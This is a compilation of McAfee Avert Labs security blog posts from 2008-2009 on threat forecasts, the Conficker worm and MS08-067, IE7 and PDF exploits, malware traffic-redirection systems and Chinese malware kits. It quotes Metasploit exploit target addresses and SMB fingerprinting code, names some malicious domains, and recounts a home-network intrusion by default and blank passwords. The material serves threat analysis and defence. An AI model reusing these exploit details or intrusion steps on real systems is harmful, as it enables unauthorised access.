Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

Over the years, the window between exploit discovery to its incorporation into a worm candidate has shrunk from months, to weeks, to zero-day. This leaves administrators with very little time to schedule and deploy patches to all servers and workstations on their network. Virus authors, on the other hand, have been at the cutting edge for including exploit code in their creations whenever a critical vulnerability is reported. The chart below shows the time frame between a vulnerability being reported and how long it took for virus authors to incorporate it into a worm candidate.

The year 2007 was the only exception in recent times for a worm not exploiting any critical Microsoft vulnerability.

It’s easy for an outsider to criticize or pass judgment on a network that was hit with a zero-day worm. Spare a thought for the IT administrator; most do not have the flexibility to deploy patches immediately to the network for policy reasons. For example, the organization could be using legacy software, which could break if a new service pack was applied. And keeping these legacy applications running takes precedence over applying the latest Windows hot fixes. Most system administrators, who work in hospitals and other mission critical jobs, don’t have the luxury of doing a Windows update!

To add to these woes, every once in a while a hot fix from Microsoft breaks something in the operating system or adversely affects other applications. Once a patch is rolled out via WSUS (Windows Server Update Service) it cannot be rolled back centrally; a faulty patch from the vendor can prove costly for the organization. For these reasons administrators need more time to deploy these hot fixes in a test environment and QA them properly before deploying them to the enterprise.

So what can an administrator do in these circumstances? Relying solely on mainstream-antivirus desktop protection or firewall-style perimeter protection is insufficient to deal with today’s modern threats. The need of the hour is defense-in-depth. Administrators, who don’t have the luxury of applying patch updates, should seriously consider having a HIPS (host intrusion prevention system) installed on the end point to prevent exploit-based worm infections. Host intrusion prevention systems not only protect systems against zero-day vulnerabilities but also give administrators more time to test and deploy patches. The recent W32/Conficker.worm outbreaks could have been nipped in the bud if more organizations had chosen to protect their systems with HIPS.

Recently we got some new samples of the W32/Conficker.Worm to analyze. While investigating we found that this worm has an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the metasploit ms08_067_netapi module to spread itself. Below is the traffic packet capture snapshot sent by the worm:

As we can see from the image above, there are some random alphanumeric characters in the packet which seem to have been generated from Rex::Text.rand_text_alpha in ms08_067_netapi.rb. And if we do a byte order conversion of data in red box above, we get 3 addresses: 0×00020408, 0×6f8917c2, 0×6f88f807, which are the internal targets of the ms08_067_netapi.rb exploit as listed below (from metasploit):

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)',
	{

                     'Ret'       => 0x6f88f807,
                     'DisableNX' => 0x6f8917c2,
                     'Scratch'   => 0x00020408
	}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

The latest metasploit exploit, besides including Windows XP/2003 OS’s; also includes several targets for languages such as English, Arabic, Czech, Danish, German, Greek Spanish Finnish, French, Hebrew, Japanese, Chinese, etc. The exploit module of ms08_067_netapi in metasploit also provides the “smb_fingerprint()” function to detect the Windows version information, Service Pack information and also the language information of the target OS. This makes programming the worm much easier and can cause much bigger impact. By using the exploit from the metasploit module as the code base, a virus/worm programmer only needs to implement functions for automatic downloading and spreading. We believe that this can be accomplished by an average programmer who understands the basics of exploitation and has decent programming skills. After further analysis of the traffic capture, we found that only the functions for detecting OS version and Service Pack information were embedded into this worm. Hence without the remote OS language determination ‘feature’, this worm only targets the English OS versions at the time of writing the blog.

Here is a packet capture snippet used in this malware to detect the OS version and Service Pack information:

By sending SMB session setup and request, it can detect OS information of target machine. If the OS is Windows Server 2003, then the Service Pack information will also be returned.

Since there are a huge number of Windows XP systems it’s obvious that the worm writer did not want to miss out on this pool, hence this is why the worm determines what the Service Pack level is by accessing \SRVSVC named pipe, which is similar to the method used in metasploit smb_fingerprint() function :

if (os == 'Windows XP' and sp.length == 0)
            # SRVSVC was blocked in SP2
            begin
                         smb_create("\\SRVSVC")
                         sp = 'Service Pack 0 / 1'
            rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
                         if (e.error_code == 0xc0000022)
                                 sp = 'Service Pack 2+'
                         end
            end
end

So in this instance it’s obvious that malware/worm writers are abusing open source tools to their advantage to make their work easier.

For those who haven’t patched their machines, we suggest you install the MS08-067 patch ASAP! If you are a McAfee Host IPS or Network IPS user, we’ve verified that you are protected against this worm by our Signatures ID’s 3961 and 0×40709d00 respectively. For VirusScan users, the DAT update version 5444 has coverage to detect this worm.

Google’s code-hosting project is the latest free service to be abused by web spammers. We’ve seen one or two previously, but over the holidays the situation appears to have got much worse. They are creating lots of new projects with the following type of website on:

Clicking the image will take you to today’s fake codec download site. Repeated clicks will take you to an adult site [both NSFW, you have been warned!].

The difference between this and the MSN Spaces abuse that is now about a year old is that Google appears to automatically index code projects, so any Google-Jedi can generate a good list (Google Search–again, don’t click the links) to start with.

Or the fact that the image is linked from http://bestsextube dot net/video.gif all the time might also be useful to know. The icing on the cake, though, is the link to somewhere/in.cgi … I’ll come back to this later.

The porntube site is also host to a number of other related sites such as fake anti-anything software:

The codec download site, which is in Latvia, also hosts a number of related sites:

The Google Code project owner has a few other projects of a similar nature, too.

A year ago I blogged about MSN Spaces beta with a very similar issue… I even spoke to some very nice folks there about it, and a year later it’s still being abused by spammers [ spamhaus award. ] I trust Google would like to appear less evil and will take more decisive action. I’d suggest mashing code and safe browsing together, but it appears not to find anything wrong with the clickable links, though it did catch on after some redirection took place.

…perhaps I should start consulting on this sort of thing

Anybody suffering deja-vous? “/in.cgi should ring an alarm bell or two. If not, check out my colleague Micha’s blog on traffic management. He explains what happens to those clicks! This is campaign “6.”

Happy new year to all!

The Web’s classical social-engineering trick of the “missing video codec” tries to lure people into clicking on links or download and install an executable which pretends to be the missing application which is needed in order to watch the movie. The animated picture below is such an example: at first glance, it looks like a typically embedded video which is unable to load. The “picture” states that you’d have to click on it in order to see the movie. And here the lure begins - in this blog entry, we’ll follow it down and outline what kind of traffic management backbones are deployed for malware campaigns nowadays.

In our example the animated image is hosted on a popular blog platform and the link points to a suspicious Flash sample. As a quick analysis reveals, the Flash is compressed and additionally contains some obfuscated JavaScript code to hide its real intention. The script code redirects to another location.

The new location points to a so-called “Traffic Management System”. In this case, if you load the URL several times, the destination rotates and after too many retries you will be always redirected to the homepage of Google. The system remembers your IP address on the server-side for a certain time period. After that time, or when you just use another IP address, you will again see the redirections when visiting the URL.

The redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Another example, which also used Geo-Location, was outlined in this Avert Labs Blog post where a downloader trojan contacted such a system and based on the country, different malware binaries were downloaded.

Such traffic management systems nowadays are configured via web-based administration interfaces. Typically the links for the “incoming traffic” look like http://www.example.com/in.cgi?three or http://www.example.com/in.cgi?default where “three” or “default” stands for different campaign IDs inside the system. A typical rule could look like shown in the following picture.

The administrator is able to define rules for “incoming traffic” which results in different “outgoing traffic” based on different restrictions. For example, the Geo-Location could be used to redirect visitors from a particular country to one location while visitors from another country will be redirected to a different location - just think of localized campaigns targeted to the spoken language in these countries. So users from the United States will not be redirected to a french phishing web site and vice versa.

These traffic management systems can also use more complex rules based on network ranges and the referrer - so lets say that only visitors with a referer from Google will be redirected to a malicious web site as long as the IP address of the visitor doesn’t come from well-known network ranges belonging to security companies.

Why do that? This way, only users searching for the website will get to the malicious redirect, while the websites’ owner or administrator, who usually does not search for it but directly enters the URL into the browser, will see the normal website with no oddities. This helps the attacker to keep the infection under the radar for a longer time.

Other trafic management systems, like shown in the above picture, also feature different logins into the web interface - for the administrator, the “sellers” and the “buyers”. This particular system has different views for sellers of traffic - that is, infected web sites containing an IFRAME that points to the trafic management system -, and buyers of traffic - e.g. the people who run exploit servers and try to install malware on unpatched computers, thus looking for potential victims. Such traffic management systems can be in between the infected web sites and the exploit servers. As you can see in the above picture also payment options can be configured, so the more traffic a seller redirects to a buyer, the more money is paid. With such systems in between, the campaigns can be easily exchanged or the “traffic” can be sold to new buyers which try to install their malware.

So the classical starter, the “missing video codec” trick, can end up in quite a complex system managing modern malware campaigns. Visiting or following a malicious ressource nowadays means that you are redirected based on a complex server-side management system.

The last major event of the year has just ended: The 25th Chaos Communication Congress’ Closing Ceremony just took place. Now in its 25th year, making it one of the oldest annual IT security conferences on the planet, more than 4,000 visitors crowded the BCC in Berlin, making it difficult to get into the talks, much like at Defcon some years ago.

For the talks: As always there was a healthy mix of technical, culture, and society-related topics (the full schedule can be found here;) surprising was the low number of local speakers talking about security problems or releasing tools. This may be related to a lot of confusion about the impact of recent German legislation banning “hackertools.” Recordings of all talks will eventually be available here.

Some of the highlights of the conference (yes, with four days and three parallel tracks I’m certainly missing some that should be mentioned) were Security Failures in Smart Card Payment Systems, by Steven Murdoch; Fabian Yamaguchi’s talk about TCP DoS Vulnerabilities; SWF and the Malware Tragedy, by BeF and fukami; FX of Phenoelit talking about the State of Attack/Defense of Routers (start watching your infrastructure, folks!) and finaly the conference highlight, a talk about creating a rogue CA Certificate, by David Molnar, Marc Stevens, Benne de Weger, Arjen Lenstra, Dag Arne Oswig, Jacob Appelbaum, and Alex Sotirov. By taking advantage of known (and widely ignored) weaknesses of md5-signed certificates and bad implementation of a CA, they were able to create a Rogue CA Certificate, trusted by all browsers–OUCH!

A very interesting note concerning the Rogue CA talk: They didn’t give out any details on what they were planing to talk about until just before the talk itself. As they were afraid that someone or some company might try to gag them and prevent the talk from happening, they were discussing the content with affected parties only under NDA. Meaning: They made the other party sign the NDA, not the other, usual, way around!

This year there were a number of talks about mobile phone (in)security and about the GSM network in general, an interesting trend to follow in the next months/years. And at the very end a vulnerability affecting many Symbian-based phones, trivial to exploit manually, had been released: SMSCurse (I’ve got no working link at the time of this writing). It basically crashes the SMS messaging on a phone and may require factory reset to restore it, depending on the phone.

I took this as an opportunity to create a current backup of my phone–how old is your latest backup?

Have a Happy and Safe New Year!

Recently we blogged about an unpatched Internet Explorer 7 exploit in the wild. With the vulnerability information made public, McAfee Avert Labs has noticed a spike in the number of active websites hosting this exploit. Lately we are seeing customized versions of the IE 7 exploit with varying degrees of obfuscation.

Malware authors have been coming up with innovative mechanisms to leverage this exploit to social engineer the not so tech-savvy internet users. One of the most prominent and unique techniques adopted by the malware authors involves a Microsoft word document being sent out to an unsuspecting user.

Upon opening the word document the embedded ActiveX control with the following classid  is instantiated and executed.

• {AE24FDAE-03C6-11D1-8B76-0080C744F389}

This control stores configuration data for the policy setting Microsoft Scriptlet Component.

The control then makes a request to the webpage hosting the IE 7 exploit. The charm with this approach is that the exploit is downloaded and run without the knowledge or permission of the user. To the unsuspecting user it will just appear as yet another normal Doc file.

Microsoft has issued workarounds to block known IE 7 exploit attack vectors. We want to reiterate to all our readers to be vigilant and cautious while opening unknown Doc files or visiting dubious websites, while we continue to monitor the threat and protect our customers against the menace .

We have lost count of how many blogs we have written this year that have anything to do with zero-day threats or unpatched vulnerabilities.

Today, many Internet users in China have reported an infection, presumably from browsing the web using a fully patched version of Microsoft Internet Explorer 7.x. My colleague Xiaobo Chen and I investigated the incident and found it to be an active exploit containing downloader shellcode that installs the Downloader-AZN Trojan (proactively detected as New Malware.n since 2005 when scanning with heuristics enabled).

The root cause was found to be the incorrect handling of certain XML tags in Internet Explorer 7.x that references already freed memory in the mshtml.dll.

We have confirmed this vulnerability to be affecting, at least, a fully patched Windows XP SP3 and a Vista SP1 system. The exploit uses publicly known heap-spray techniques that enable control over a vtable pointer, allowing arbitrary code execution.

Fortunately, the 5404 DATs proactively detect the Downloader-AZN Trojan, but there could be other variants. Additional coverage is going into today’s DATs to detect the malicious web scripts as Exploit-XMLhttp.d or Exploit-XMLhttp.c Trojan.

Details about this vulnerability, as well as exploit code, are known to be publicly available.

More information on this situation will be posted as it becomes available.

Today McAfee released its Virtual Criminology Report, our annual study of global cybercrime. We found that cybercriminals are targeting their scams to play off of the economic recession, and governments need to be doing more collaboration to face the problem.

The economic downturn affected cybercrime scams almost immediately. As soon as banks started struggling and mergers and acquisitions became commonplace, we started seeing an immediate increase in banking scams asking users to ‘update their account information’ before the bank changed hands. With almost all of today’s malware being financially motivated, even cybercriminals are looking for more business in tough economic times and are really stepping up their game.

This represents an evolution in the trend of cybercriminals getting smarter and faster about what they do. When news of a specific banks going under hits, scams and malware utilizing that messaging will emerge the very next day. The same happened with threats throughout this year’s presidential race as well as post-election; when President-Elect Barack Obama messaged malware emerged as early as November 5.

The environment of fear and anxiety in consumers that is being caused by the downturn also provides opportunity for cybercriminals to lure consumers into what they think are ‘internet sales marketer’ positions, where they are actually unknowingly assisting in criminal activity as money launderers. We have been seeing an increase in the number of these job postings and recruitment emails promising job seekers will ‘get rich quick.’ The scams are also strategically worded to place high on Google job searches, and are of course designed to look like legitimate job postings.

It is more important than ever that computer users educate themselves in safe searching and safe computing habits. Technology alone cannot solve the problem. Education alone cannot solve the problem. Both combined, however, can enable us all to use the Internet the way we want.

Download your copy of the report here.

Educate. Advocate. Protect.

A picture is worth a thousand words…

First let me say, “PATCH your systems” if you have not done so already!

Seriously, you and your machines are sitting ducks for attacks such as MS08-067, which we learned about from Microsoft last month. This type of attack is especially dangerous if your Windows Updates or security products are not up to date. Microsoft released its out-of-cycle emergency patch on the 23rd of October–more than one month ago–so you have no excuse today for being at risk!

At McAfee Avert Labs we have seen a few proof-of-concept binaries using the exploit code that was released into the wild to attack this Windows Server Service vulnerability; the latest is W32/Conficker.worm. According to the description in our Virus Information Library, W32/Conficker.worm decides how it will load itself as a Windows Service depending on whether the compromised version of Windows is Windows 2000.

Once loaded in the service space, the worm attempts to download files from the Internet–specifically, further malware from trafficconverter.biz and data files from maxmind.com.

The worm continues by setting up an HTTP server that listens on a random port on the victim’s system while hosting a copy of the worm. It then scans for new vulnerable victims to exploit, at which point the new victim will download the worm from the previous victim and so on.

To recap McAfee’s coverage and protection for this vulnerability, please check here. We have increased coverage in today’s DATs (Version 5445) to protect against this, and future variants, of the W32/Conficker.worm.

For more information on the Microsoft vulnerability, refer to their security bulletin.

As many of us enter the holiday season of Thanksgiving it’s vital to ensure your systems are patched and up to date while you’re enjoying your time off. Malware doesn’t break for holidays!

Today marks another day of momentous change for McAfee’s research teams.

I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

We welcome Secure Computing to the McAfee research family.

Jeff Green
Senior Vice President
McAfee Avert labs

Probably the most widely reported topic in the Chinese Security community this month will be the availability of a commercial MS08-067 attack pack, customized for Chinese users. On October 26th, 2008, exploit code was posted on to a well-known public repository site. In a few days, malware kit author, WolfTeeth, was quick to sell a MS08-067 port scanning tool with attack capability to his “customers”, using free code from the Internet.

Taking a peek into his “malware shop”, one finds a series of malware kits for sale - including a BackDoor kit (a.k.a. Beetle Remote Control Kit). It offers features similar to BackDoor-AWQ, another commercial kit that was also notoriously sold on a Chinese website. Both kits offers a free version, and a commercial version with enhanced features including:

• Kernel rootkit.
• Anti-virus software termination.
• Weekly anti-virus detection monitoring and evasion service.
• Web DDOS attack option (using a method to target webservers using expensive HTTP requests such as an active web application site).

The seller invites interested “customers” to contact him for a quote, but on another page, he has publicly priced a AdClicker trojan kit at CNY258 (~USD$37.80). This kit allows his “customers” to make money from pay-per-click sites using infected machines. Similarly, this kit claims “advanced” features to terminate popular anti-virus software in China, downloads updates and stealth capability.

Oh, wait, he also posted a disclaimer to remind all “customers” that his tools must never be used for “legal purposes” and is sold for “research use” only. For customer service, he has also warned his “customers” about “trojanized” versions of his kit distributed by others on the Internet, that will install a backdoor to spy on the backdoor user.

This malware shop is hosted on a domain registered very recently, on October 16th, 2008 to someone by the name of Wang Zeyu, possibly from Nanjing, China. Since the release of the tool, it has gained some attention from the mainstream Chinese media.

McAfee Avert Labs detects the toolkit as Exploit-MS08-067 (Generic.dx in older DATs), and the dropped exploit and port scanning tool as Exploit-MS08-067 trojan and Tool-TCP Scan application.

Following on from Pedro’s blog yesterday [Election day is over] and the recent news that the computers of both Campaigners were hacked during the summer [Security focus blog], I wanted to give you a short overview of the different Malware we saw here at McAfee Avert Labs during the US Presidential race.

Due to the high media attention which Barack Obama received, it seems that the Malware Authors specifically targeted him instead of John McCain as a means of luring users into clicking on the Malware.

One of the first pieces of malware we saw which exploited the campaign was in August. This was a spammed email which contained a link to get_flash_updates.exe . The email contained the subject “Obama bribes countrymen to win votes”, if the user followed the link it would download Get_Flash_updates.exe which was a BackDoor-DNM Trojan.

The above was similar to a spamming campaign which Alex Hinchliffe blogged about earlier on this year [Super Wednesday].

A few weeks later we received a file called Obama_*.exe (I renamed the file due to it containing offensive language) which was detected as PWS-Banker.cs. The file used the Window Media Video icon and upon execution dropped the following file: %WinDir%\system32\siemens32.dll. The malware also loaded a video in order to make the user believe that it was in fact a video file.

Yesterday we received a file named BarackObama.exe which Pedro blogged about [Election day is over]. We also went Low Profile on the Generic PWS.y!6F939359 which was being talked about on several different sites [Washington Post] [NetWork World]

Finally today we also received a new one which was named Beat_Obama_178.exe. This was a simple downloader which attempts to download a file from a Chinese website. This will be detected as Generic Downloader.Z in tomorrows Dat release.

We expect to see several more malicious files using the US Presidential election as a means of Social Engineering in order to trick users into executing them. So please be on the look out and keep your security software up to date.

It has been over 2 years since I last wrote about malware exploitation of a major vulnerability in the Windows Server Service (MS06-040) by malware.

In 2006, worm authors were quick to adopt the remotely executed exploit in just 4 day following a security update released as part of the regular Patch Tuesdays - IRC-Mocbot, W32/Sdbot, W32/Spybot, W32/Opanki, et ceteras.

Now in 2008, we are faced with malware authors, motivated by profits, more organized, and are more likely to target zero-day vulnerabilities, as we have reported on several critical incidents we have discovered since 2006. Like déjà vu, Microsoft released an out-of-cycle security update today to address in-the-wild attacks against a new MS08-067 vulnerability targeting the same Windows Server Service.

Attacks seen in the wild so far seem to have come from variants of the Spy-Agent.da trojan. When run, it may not be immediately apparent to the victim that it was using any exploits. Taking a quick glimpse into the binary code of basesvc.dll (Spy-Agent.da.dll), one of the DLL components installed by Spy-Agent.da, one can see strings that would look very familiar to those familiar with MS06-040.

On closer analysis, Spy-Agent.da.dll seeks out potentially vulnerable Windows machines in the local network, and sends maliciously crafted DCERPC requests to exploit the Server Service (SvrSvc).

When successful, hardcoded shellcode embedded within the malware, is executed on the targeted machines to download Spy-Agent.da (or possibly other variants or files) from a web server hosted in Japan.

(shellcode after decoding)

Just hours following the patch release, public source code has already been seen distributing on the Internet. What more can I say ? Patch your systems ! Yes, NOW !

Spy-Agent.da and Spy-Agent.da.dll are now detected using the current 5414 DATs. See Dave’s blog for McAfee’s coverage.

(thanks to Joey Koo and Xiaobo Chen for providing analysis data and packet dumps used in this blog)

Due to the MS08-067 out-of-cycle release from Microsoft today we are in the process of releasing emergency DATs/coverage updates for many of our products and technologies. We are also working on an emergency Security Advisory as well.

Current state for each of the content areas is as follows:

Malware - Emergency DAT cut and testing in progress. ETA of 2 - 3 hours.

HIPS - Generic buffer overflow should provide coverage.

Intrushield - Partial existing coverage. Additional emergency sigset releasing today.

Foundstone - Emergency signatures being released today.

V-Flash - Emergency signatures being released today.

MNAC - Emergency signatures being released today.

VirusScan Enterprise BOP - Should provide coverage for the buffer overflow.

We will continue to monitor this critical event to provide the most comprehensive coverage we can.

Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 - What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting - Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

YouTube is an excellent resource for video sharing: Users can upload, view, and share video clips. It’s also not novel to find a legitimate web site being used as a vector to spread porn-spewing malware. We blogged earlier about fake video embedded in blogspot domains and attackers capitalizing on sensational news hitting the media. This time attackers are promising free adult video on YouTube to assault unsuspecting users.

Attackers are using fake profiles that contain a video link to YouTube to kick-start an infection. This profile contains a link pointing to:

http://superelection[blocked].info

The preceding web site is infamous for various U.S.-election-related spam and hosts a cocktail of exploits that attempt a drive-by installation on the victim’s machine. The site also attempts to social engineer the victim by promoting a fake codec that installs the Puper Trojan. We have identified multiple profiles connecting to various exploit-serving sites hosting the fake codec. The attackers have been successful in promoting this attack by posting the YouTube links to various forums. With numerous visits to this YouTube link so far, the chances are good that a number of users have fallen victim to this attack.

We advise all Internet users to follow safe browsing practices and keep their systems patched. Meanwhile we at McAfee Avert Labs will continue to protect our customers against such attacks.

A zero-day exploit against the latest QuickTime (Version 7.5.5) and iTunes (8.0) was released yesterday. The exploit author announced this as a remote heap overflow so we decided to take a look and analyze it.

After our research, we found that this is actually an off-by-one stack overflow. Some noteworthy points:

1. QuickTime has the /GS switch option enabled, hence a cookie is put into the stack.

2. Since this is an off-by-one stack overflow, the attacker can just overwrite one byte of the cookie. The Check_stack_cookie function is called when the function returns. If the Check_stack_cookie found out that the cookie is not matched, then the program exits. This results in the crash of QuickTime and iTunes.

The crash means it is unlikely that code execution would be feasible via this attack vector. Howerver, users of these apps should take the attack seriously and look at appropriate defenses.

I was at a friend’s house this past weekend when I asked to connect to his wireless router with my laptop. This friend was not computer savvy so I wasn’t surprised to find that security was not configured on his router.

This reminded me of an article (Secure You Wireless Router) a colleague of mine at Avert Labs had written several months ago about how more and more homes in China nowadays have wireless routers, but very few people bother to secure their routers.

I proceeded to lecture my friend about the importance of being security-aware, and the dangers of not being so - identity theft, stolen passwords, private documents, pictures, etc.

To demonstrate my point, I asked his permission to perform a penetration test which he agreed to.

I proceeded with the same steps described in my colleague’s article. I obtained an IP on the unsecured network, found the router’s IP, opened up a browser to that IP and was presented with the router’s administration login page. A quick search online easily gave up the default admin password for this router - “admin”. I tried that and sure enough, got into the admin page.

Next I checked the logs on the router and identified an active host on the network that was not my own. I then tried to open a NetBIOS NULL session with the host which worked. So far everything I tried had worked on the first attempt. Getting the NULL session opened up some opportunities for some good information gathering. For one, I determined that the host was running Windows 2000. More interestingly, I was able to get a list of user accounts. All without the need for a username and password. Only one of the accounts sounded like it was user-created. I tried to map a drive using that account with a blank password, and failed. I tried a few more times before giving up on guessing passwords.

I was using my work laptop so I had a Foundstone Enterprise install handy. I scanned the host for vulnerabilities, looking out for anything remotely exploitable. I came up with a handful, but one check jumped out at me - “Administrator Account Has No Password”. I tested this by mapping a drive with the administrator account and a blank password, half hoping that it was a mis-detection. Alas, the map succeeded and at this point the demonstration was over. I now had full access to my friend’s filesystem, and now the possibilities were endless. Having an Administrator account with a blank password on a Windows machine is such an old security hole that I didn’t even bother to test it early on.

For the home user, here are are just a couple tips to get you started with security and get you in way better shape than my friend:

1. Secure your wireless network. Look up how to do it online or have your techie friend do it for you, like I did for mine.
2. Set a strong password for your Windows Administrator account. Better yet, disable the account.
3. Disable NULL sessions. Look up how to do it online.

One of the issues that we’ve been highlighting at our recent conference presentations and blogs was the emergence of major localized threats around Asia. McAfee Avert Labs discovered yet another unidentified vulnerability in the Japanese word processor , Ichitaro, last Friday.

This Japanese application have been known to be under the targeted attacks for several years and a few 0-day vulnerabilities were discovered and exploited in the past. Other than Ichitaro, other popular and localized applications are often targeted by 0-day exploits. We also frequently observe exploits targeting vulnerabilities, even months after they have already been patched by the vendor.

Users should continue to stay vigilant of any suspicious email attachments, and do not open unknown files. Please be sure to update your applications, whether it is popular or not, with the latest security patches to protect you and your organization from the known attacks.

These newly crafted malicious documents are detected as Exploit-TaroDrop.e trojan, and the payload as BackDoor-DRZ trojan in the 5368 DATs.

The vendor has acknowledge the vulnerability and will be posting a patch.

An independent security research firm has announced several new mobile Java (J2ME) security vulnerabilities. Two of the vulnerabilities affect the Java virtual machine (JVM) on mobile phones, and the other 14 are specific to Nokia Series 40 phones. Series 40 mobiles are not Symbian smartphones and run only J2ME MIDlets.

The reported vulnerabilities and exploits in the JVM could allow the running of untrusted Java MIDlets. After using those vulnerabilities, relatively recent phones running S40, 3rd edition are open to malicious MIDlets that exploit the others.

According to the researchers the vulnerabilities allow:

• gaining additional privileges for a malicious MIDlet, even manufacturer or mobile carrier level
• running a malicious MIDlet when the phone is first turned on
• accessing files
• sending SMS/MMS
• making phone calls
• reading your contacts
• accessing the SIM card
• eavesdropping using the camera and microphone

Java phones used to be affected by malware such as J2ME/Redbrowser or J2ME/Wesbe,r which cause just premium rate charges. This is the first time that such phones have been vulnerable to more malicious malware.

The security research company has produced a report of more than 170 pages on the vulnerabilities and a number of proof of concept(PoC) exploits. Usually when researchers develop PoC code or malicious samples, they provide them directly to the security research community. In this case, the researchers are asking for €20,000 (about $30,000) for early access to the research and malware. After the release of vulnerability information, attackers will generally attempt to write exploits.

We came across some samples and some vendors claims that the these samples were exploiting the new PDF vulnerability CVE-2008-2641.

We took a look at this issue and found that this is not the case, it’s still exploiting the old vulnerability CVE-2007-5659, which is a buffer overflow vulnerability in JavaScript function Collab.collectEmailInfo in Adobe PDF Reader’s own JavaScript Engine.

The JavaScript itself was compressed in the PDF file. After decompressing the content, it showed up an obfuscated JavaScript code. After digging through the obfuscated code, the real exploit was found encrypted in a long string. There is a function which decrypts the string into real exploit code and then pass it to the eval() function.

It’s interesting that the function uses the function code itself (arguments.callee) as part of the key to decrypt the real exploit code, so it won’t work if you simply replace eval() with “alert” or “document.write” to get the real exploit as eval() itself is also part of the key. It’s an interesting way to obfuscate the exploit code to prevent security researchers to reach the real exploit, almost like creating a ’self-checksum’ mechanism.

After we figured out the way to get the real JavaScript exploit code we found that it exploits CVE-2007-5659 reliably with heap spray technology.

Some vendors claim that the exploit works on lower versions but crashes 8.1.2, this is not the case because it’s possible that it might be taking some time for the heap spray to fill the memory. So during that period, we observed that the adobe reader lost response, but it’s not a crash. After a couple minutes, its back to normal, and pop ups a dialog box “Send by Email for review”. So, in short Adobe reader 8.1.2 seems to be immune to this exploit as Adobe already patched this vulnerability.

Avert Labs recently discovered and reported a couple of Linux Kernel vulnerabilities, all of which have been patched by linux kernel maintainers.

The first one is BER Decoding Remote vulnerability (CVE-2008-1673) . This vulnerability was patched by the Linux dev team on 9th June 2008.

This vulnerability is a kernel heap overflow in CIFS module and ip_nat_snmp_basic module. It’s possible to reach the exploitable condition on 64bit platform. Though its hard to trigger a kernel heap overflow in 32bits platform, it’s still possible to crash the Linux box. We strongly recommend users to update to the following kernel versions:

Linux kernel 2.6.25 .5
Linux kernel 2.6.26-rc5-git1
Linux kernel 2.4.36.6

Some vendors have mistakenly marked this as a vulnerability exploitable only in the local network. A correction for them, this vulnerability is remotely exploitable. We contacted one such security service providers who had mentioned this issue as exploitable over the ‘local network’ only and got this response:

“According to our information the ASN.1 decoding vulnerability exists within the modules handling CIFS and SNMP traffic. These are both protocols which we think should be firewalled off the Internet via common “best practices”, thus we set the attack vector to “local network” only.”

I don’t really agree with this approach, anything that is firewallable is locally exploitable then? In fact I would rather say that it is remote vulnerabilities like these that need firewall policies to be enabled and not the other way round. I would love to hear opinions from others on this issue.

BTW our McAfee Network Security Platform (formerly IntruShield) has already been updated with content to protect against this vulnerability.

The other issue was found by Brandon Edwards which is another interesting issue in DCCP, it is a local privilege escalation vulnerability (CVE-2008-2358). The vulnerability (supposedly) only exists in 2.6.17, 2.6.18, and 2.6.19 due to boundary checks in the upstream kernel versions. It is non-trivial to exploit this vulnerability.

Nuwar families are known for using social engineering to trick users to download themselves. As we mentioned in the blog last month, the topic of the earthquake in China has been used by malware authors for social engineering for weeks. This time, the most recent variant of Nuwar circulates a fake topic - Beijing earthquake (Not Sichuan earthquake!).

If users click on the fake video image, the file “beijin.exe” (W32/Nuwar@MM) is downloaded. However, users might be infected with Nuwar even if they don’t click it. This page has the iframe link to a malicious javascript.

Upon accessing the above page, the obfuscated javascript is downloaded and run because of the injected iframe. The JavaScript exploits the realplayer vulnerability CVE-2008-1309 and download another variant of Nuwar.
McAfee VSE blocks the script and detect as “JS/Exploit-Shell.gen”.

